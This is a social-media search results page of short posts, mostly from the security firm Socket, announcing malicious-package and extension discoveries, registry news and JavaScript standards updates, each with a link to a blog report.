home.social

Search

51 results for “SocketSecurity”

  1. Karl Ostendorf @[email protected] ·

    RE: fosstodon.org/@SocketSecurity/

    This might also be a reason why, especially since Go benefits from a package system that can pull from any URL, people might want to move off of Github. Name-spoofing becomes a little more difficult when you have your own domain.

    #golang

    #golang
  2. सुरेन्द्र @surendrajat ·

    RE: fosstodon.org/@SocketSecurity/

    @bitwarden is this true?

    #compromised #bitwarden
  3. सुरेन्द्र @[email protected] ·

    RE: fosstodon.org/@SocketSecurity/

    @bitwarden is this true?

    #compromised #Bitwarden

    #compromised #bitwarden
  4. सुरेन्द्र @[email protected] ·

    RE: fosstodon.org/@SocketSecurity/

    @bitwarden is this true?

    #compromised #Bitwarden

    #compromised #bitwarden
  5. ECMAScript News @[email protected] ·

    TC39 advances 10+ ECMAScript proposals
    @sarahgooding @SocketSecurity
    socket.dev/blog/tc39-advances-

    #ECMAScript #JavaScript #TC39

    #ecmascript #javascript #tc39
  6. Frontend Dogma @[email protected] ·

    The Hidden Blast Radius of the Axios Compromise, by @ahmadnassri (@SocketSecurity):

    socket.dev/blog/hidden-blast-r

    #dependencies #npm #security

    #security #npm #dependencies
  7. Frontend Dogma @[email protected] ·

    Node.js TSC Votes to Stop Distributing Corepack, by @sarahgooding (@SocketSecurity):

    socket.dev/blog/node-js-tsc-vo

    #nodejs #corepack

    #corepack #nodejs
  8. AA @[email protected] ·

    New.

    Socket: TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks socket.dev/blog/teampcp-supply @SocketSecurity #infosec

    #infosec
  9. AA @[email protected] ·

    Posted yesterday, if you missed this:

    Socket: 5 Malicious NuGet Packages Impersonate Chinese UI Libraries to Distribute Crypto Wallet and Credential Stealer socket.dev/blog/5-malicious-nu @SocketSecurity #infosec #threatresearch #Windows

    #infosec #threatresearch #windows
  10. Frontend Dogma @[email protected] ·

    TC39 Advances “Array.fromAsync”, “Error.isError”, and Explicit Resource Management to Stage 4, by @sarahgooding (@SocketSecurity):

    socket.dev/blog/tc39-advances-

    #ecmascript #arrays #errors

    #errors #arrays #ecmascript
  11. BoxyHQ @[email protected] ·

    New on the BoxyHQ blog - Progress and Challenges In Securing The Web Ecosystem in 2023 - A Year in Review by BoxyHQ 📦 boxyhq.com/blog/boxyhq-2023-ye #opensource #saml #sso #news #securingtheweb #mvsp - Notable mentions: @osi @SocketSecurity @fidoalliance

    #opensource #saml #sso #news #securingtheweb #mvsp
  12. BoxyHQ @boxyhq ·

    New on the BoxyHQ blog - Progress and Challenges In Securing The Web Ecosystem in 2023 - A Year in Review by BoxyHQ 📦 boxyhq.com/blog/boxyhq-2023-ye - Notable mentions: @osi @SocketSecurity @fidoalliance

    #opensource #saml #sso #news #securingtheweb #mvsp
  13. Socket @SocketSecurity ·

    cc: @campuscodi

  14. Socket @SocketSecurity ·

    🚨 Socket detected malicious activity in newly published versions of node-ipc, an npm package with 822K weekly downloads.

    Affected versions:
    [email protected]
    [email protected]
    [email protected]

    Socket’s AI scanner flagged the malware within ~3 minutes of publication.

    Early analysis shows obfuscated stealer/backdoor behavior, including host fingerprinting, local file enumeration, payload wrapping, and attempted exfiltration.

    socket.dev/blog/node-ipc-packa

  15. Socket @SocketSecurity ·

    🐘 @packagist is urging projects to update Composer after a GitHub token format change caused some GitHub Actions tokens to be exposed in CI logs.

    GitHub has rolled back the token change for now, but affected projects still need to update Composer.

    socket.dev/blog/packagist-urge

    #php
  16. Socket @SocketSecurity ·

    🚨 Socket’s Threat Research Team uncovered a malicious Chrome extension posing as an wallet. It steals seed phrases by encoding them into transactions and leaks them on-chain - no C2 needed.

    socket.dev/blog/malicious-chro

    #ethereum #sui #crypto
  17. Socket @SocketSecurity ·

    🚨 New Research: Threat actors compromised four extensions, pushed malicious updates that load encrypted malware, evade Russian locales, and fetch C2 instructions via memos, leading to macOS credential and wallet theft.

    Full analysis: socket.dev/blog/glassworm-load

    #openvsx #solana
  18. Socket @SocketSecurity ·

    🚨 New research: A malicious Chrome Web Store extension is stealing newly created API keys and exfiltrating them to a Telegram bot, enabling full account takeover with trading and withdrawal rights.

    Details → socket.dev/blog/malicious-chro

    #mexc #crypto
  19. Socket @SocketSecurity ·

    🚨 We detected malicious client packages published to npm and PyPI after a maintainer account compromise, enabling wallet theft and remote code execution.

    Full investigation → socket.dev/blog/malicious-dydx

    #dydx #crypto
  20. Socket @SocketSecurity ·

    🚨 New threat research: An impostor package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated wallet JSON and passwords to a Russian IP address.

    Full report →
    socket.dev/blog/malicious-nuge

    #nuget #stratis #dotnet
  21. Socket @SocketSecurity ·

    🚨 New from the Socket Threat Research Team: 5 coordinated Chrome extensions hijack sessions and block security controls in enterprise HR and ERP platforms like Workday and NetSuite.

    Full report → socket.dev/blog/5-malicious-ch

    #cybersecurity #enterprisesecurity
  22. Socket @SocketSecurity ·

    🚨 The Socket Research team has uncovered a malicious npm package targeting developers using tools in their development environments: socket.dev/blog/malicious-npm-

    #ethereum #hardhat
  23. Socket @SocketSecurity ·

    📦 Our latest investigation of Black Basta's leaked chats shows how they were plotting to exploit open source package registries to deploy ransomware, plus our analysis of & wiperware packages already in the wild.

    socket.dev/blog/black-basta-de

    #ransomware #blackbasta #cybersecurity
  24. Socket @SocketSecurity ·

    At , NIST revealed that the NVD is scrapping its consortium plan, walking back last year’s promise of reform, while pitching new tools that critics say won't meaningfully address the backlog or transparency problem.

    socket.dev/blog/vulncon-2025-n

    #vulncon #cve #cybersecurity #vulncon2025
  25. Socket @SocketSecurity ·

    🚨 Socket researchers discovered an npm package targeting traders. It hunts for wallet keys & credentials, then exfiltrates them via Telegram. A second package serves as a minimal wrapper to execute the payload.

    Full report → socket.dev/blog/malicious-npm-

    #crypto #bullx #javascript
  26. Socket @[email protected] ·

    🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

    #ethereum #hardhat
  27. Socket @[email protected] ·

    🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

    #ethereum #hardhat
  28. Socket @[email protected] ·

    🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

    #hardhat #ethereum
  29. Socket @SocketSecurity ·

    🚀 Exciting news: Socket is now part of TC54! We're joining forces to help shape the future of SBOMs, CycloneDX, and PURL, making software supply chains more secure & transparent.

    socket.dev/blog/socket-joins-t

    #sbom #cyclonedx #purl #cybersecurity
  30. Socket @SocketSecurity ·

    📌 New from the Socket Research Team: A malicious npm package disguised as an integration triggers a reverse shell during payment success. Unlike many malicious packages that execute code during installation, this payload is delayed until runtime.

    socket.dev/blog/npm-package-ad

    #advcash #javascript
Next page